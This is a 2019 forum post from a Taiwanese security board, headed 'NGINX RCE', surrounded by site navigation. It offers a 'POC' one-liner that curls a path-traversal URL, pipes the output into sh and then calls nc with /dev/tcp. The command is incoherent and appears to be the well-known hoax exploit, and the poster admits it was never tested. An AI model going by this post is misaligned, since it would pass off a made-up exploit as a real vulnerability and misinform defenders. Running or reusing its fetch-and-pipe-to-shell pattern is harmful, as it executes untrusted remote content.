PTT數位生活區 / NetSecurity (資安資訊安全)

[情報] NGINX RCE

看板NetSecurity (資安資訊安全)作者CMJ0121 (不要偷 Q)時間5年前 (2019/06/01 10:58)推噓0(0推 0噓 1→)

留言1則, 1人參與討論串1/1

https://github.com/nginx/njs/issues/159 https://twitter.com/alisaesage/status/1134400951043874816 https://twitter.com/notdan/status/1134559331989434368 POC 的方式： curl -gsS \ https://victim.server.here:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00 \ <'protocol:TCP' -O 0x0238f06a#PLToffset | \ sh; nc /dev/tcp/localhost 完全沒經過測試不過先升級 nginx 就是對的 -- ※ 發信站: 批踢踢實業坊(ptt.cc), 來自: 106.1.224.240 ※ 文章網址: https://www.ptt.cc/bbs/NetSecurity/M.1559357916.A.FB5.html

→

06/02 15:52, 5年前 , 1^F

06/02 15:52, 1^F

‣ 返回看板[ NetSecurity ] 系統

‣ 更多 CMJ0121 的文章

文章代碼(AID): #1SyUdS-r (NetSecurity)

NetSecurity 近期熱門文章

1

1

[閒聊] 資安雙週報 241101

[ NetSecurity ]

3周前, 11/01

2

7

[閒聊] 資安雙週報 241001

[ NetSecurity ]

1月前, 10/01

4

5

[閒聊] 資安雙週報 240915

[ NetSecurity ]

2月前, 09/15

3

3

[閒聊] 資安雙週報 240901

[ NetSecurity ]

2月前, 09/01

3

6

[閒聊] 資安雙週報 240815

[ NetSecurity ]

3月前, 08/15

3

4

[問題] ISC2 考試證件問題

[ NetSecurity ]

3月前, 08/14

1

1

[閒聊] 資安雙週報 240715

[ NetSecurity ]

4月前, 07/15

2

2

[情報] regreSSHion (CVE-2024-6387)

[ NetSecurity ]

4月前, 07/02

更多近期熱門文章 >>

PTT數位生活區即時熱門文章

7

35

[菜單] 110K 遊戲主機含螢幕

[ PC_Shopping ]

2小時前, 11/24

4

9

Re: [閒聊] D8000pro Ltd 開箱奇遇記

3小時前, 11/24

0

63

[菜單] 40k內遊戲機

[ PC_Shopping ]

5小時前, 11/24

10

42

Re: [閒聊] D8000pro Ltd 開箱奇遇記

6小時前, 11/24

9

16

[購機] 大螢幕微曲面手機 25K以下

6小時前, 11/24

23

75

Re: [閒聊] 9800X3D無限伍壓的住嗎

[ PC_Shopping ]

7小時前, 11/24

3

10

[心得] Earfun Air Pro 4 平價藍牙真無線耳機

8小時前, 11/24

11

13

[閒聊] 漲價前手刀買mystj hs音響架

8小時前, 11/24

更多即時熱門文章 >>

‣ 返回看板[ NetSecurity ] 系統

‣ 更多 CMJ0121 的文章

文章代碼(AID): #1SyUdS-r (NetSecurity)